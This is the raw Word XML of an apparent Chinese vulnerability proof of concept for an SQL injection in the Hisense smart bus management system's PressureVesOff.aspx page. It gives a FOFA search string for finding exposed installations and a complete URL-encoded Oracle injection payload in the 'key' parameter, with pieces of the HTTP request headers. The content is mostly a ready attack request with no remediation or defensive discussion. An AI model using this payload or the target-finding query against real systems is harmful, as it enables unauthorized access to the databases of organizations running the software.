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9763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海信智能公交企业管理系统 PressureVesOff.aspx SQL注入漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F10D69">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B2C0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FOFA：body="var _FactoryData"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F839F5E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E46B39E"/>
    <w:p w14:paraId="73D544E3"/>
    <w:p w14:paraId="36A5B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399D853">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AA10E3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/YZSoft/Forms/XForm/BM/PressureVesManagement/PressureVesOff.aspx?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key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1%27+AND+8768%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2898%29%7C%7CCHR%28113%29%7C%7C%28SELECT+%28CASE+WHEN+%288768%3D8768%29+THEN+1+ELSE+0+END%29+FROM+DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28112%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28113%29%29--+CUzO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6992711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6AE8952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Chrome/120.0.0.0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2079F2E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4293D1E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262DA9E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zh-CN,zh;q=0.9,en;q=0.8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4804F41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close</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0236B39A"/>
    <w:p w14:paraId="0C755758">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="447969D8"/>
    <w:p w14:paraId="17393E6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46ABF"/>
    <w:rsid w:val="0F1B20A3"/>
    <w:rsid w:val="2EAE0760"/>
    <w:rsid w:val="397615D9"/>
    <w:rsid w:val="3E47104C"/>
    <w:rsid w:val="4F6C4E55"/>
    <w:rsid w:val="506C23FD"/>
    <w:rsid w:val="52604158"/>
    <w:rsid w:val="567F7FA4"/>
    <w:rsid w:val="5CFF3BED"/>
    <w:rsid w:val="60A3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814</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>0</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>837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2025-07-14T06:44:00Z</dcterms:created>
  <dc:creator>Admin</dc:creator>
  <cp:lastModifiedBy>追梦轩</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-23T08:08:56Z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40E9BE67C62248428D32A19D1861FB5D_12</vt:lpwstr>
  </property>
</Properties>
</file>